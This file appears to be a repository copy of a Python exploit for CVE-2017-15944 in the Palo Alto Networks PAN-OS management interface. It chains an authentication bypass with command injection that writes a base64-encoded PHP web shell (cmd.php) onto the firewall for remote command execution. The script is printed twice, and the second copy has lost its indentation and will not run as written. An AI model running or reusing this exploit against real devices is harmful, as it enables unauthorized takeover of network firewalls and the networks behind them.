milo2012/CVE-2017-15944_1.py

## CVE-2017-15944_1.py
#!/usr/bin/env python
# encoding: utf-8
import requests
import sys
import base64
requests.packages.urllib3.disable_warnings()
session = requests.Session()
def step3_exp():
	exp_post = "{\"action\":\"PanDirect\",\"method\":\"execute\",\"data\":[\"07c5807d0d927dcd0980f86024e5208b\",\"Administrator.get\",{\"changeMyPassword\":true,\"template\":\"asd\",\"id\":\"admin']\\\" async-mode='yes' refresh='yes' cookie='../../../../../../var/cores/$(echo PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==|base64 -d >${PATH:0:1}var${PATH:0:1}appweb${PATH:0:1}htdocs${PATH:0:1}api${PATH:0:1}cmd.php).core -print -exec python -c exec(\\\"PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==\\\".decode(\\\"base64\\\")) ;'/>\\u0000\"}],\"type\":\"rpc\",\"tid\":713}"
	return exp_post
def exploit(target, port):
    step2_url = 'https://{}:{}/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";'.format(target, port)
    step3_url = 'https://{}:{}/php/utils/router.php/Administrator.get'.format(target, port)
    #proxies = {'https': 'http://127.0.0.1:8080'}
    #session.proxies.update(proxies)
    try:
    	if session.get(step2_url, verify=False).status_code == 200:
    		exp_post = step3_exp()
    		print(step3_url)
    		print(exp_post)
    		rce = session.post(step3_url, data=exp_post, verify=False).json()
    		print(rce)
    		if rce['result']['@status'] == 'success':
    			print('[+] Success, please wait ... ')
    			print('[+] JobID: {}'.format(rce['result']['result']['job']))
    		else:
    			exit('[!] Fail')
    	else:
    		exit('[!] Bypass fail')
    except Exception as err:
    	print(err)
if __name__ == '__main__':
    if len(sys.argv) <= 3:
        exploit(sys.argv[1], sys.argv[2])
    else:
        exit('[+] Usage: python CVE_2017_15944.py IP PORT')
	#!/usr/bin/env python
	# encoding: utf-8
	import requests
	import sys
	import base64
	requests.packages.urllib3.disable_warnings()
	session = requests.Session()
	def step3_exp():
	exp_post = "{\"action\":\"PanDirect\",\"method\":\"execute\",\"data\":[\"07c5807d0d927dcd0980f86024e5208b\",\"Administrator.get\",{\"changeMyPassword\":true,\"template\":\"asd\",\"id\":\"admin']\\\" async-mode='yes' refresh='yes' cookie='../../../../../../var/cores/$(echo PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==\|base64 -d >${PATH:0:1}var${PATH:0:1}appweb${PATH:0:1}htdocs${PATH:0:1}api${PATH:0:1}cmd.php).core -print -exec python -c exec(\\\"PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==\\\".decode(\\\"base64\\\")) ;'/>\\u0000\"}],\"type\":\"rpc\",\"tid\":713}"
	return exp_post
	def exploit(target, port):
	step2_url = 'https://{}:{}/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user\|s."1337";'.format(target, port)
	step3_url = 'https://{}:{}/php/utils/router.php/Administrator.get'.format(target, port)
	#proxies = {'https': 'http://127.0.0.1:8080'}
	#session.proxies.update(proxies)
	try:
	if session.get(step2_url, verify=False).status_code == 200:
	exp_post = step3_exp()
	print(step3_url)
	print(exp_post)
	rce = session.post(step3_url, data=exp_post, verify=False).json()
	print(rce)
	if rce['result']['@status'] == 'success':
	print('[+] Success, please wait ... ')
	print('[+] JobID: {}'.format(rce['result']['result']['job']))
	else:
	exit('[!] Fail')
	else:
	exit('[!] Bypass fail')
	except Exception as err:
	print(err)
	if __name__ == '__main__':
	if len(sys.argv) <= 3:
	exploit(sys.argv[1], sys.argv[2])
	else:
	exit('[+] Usage: python CVE_2017_15944.py IP PORT')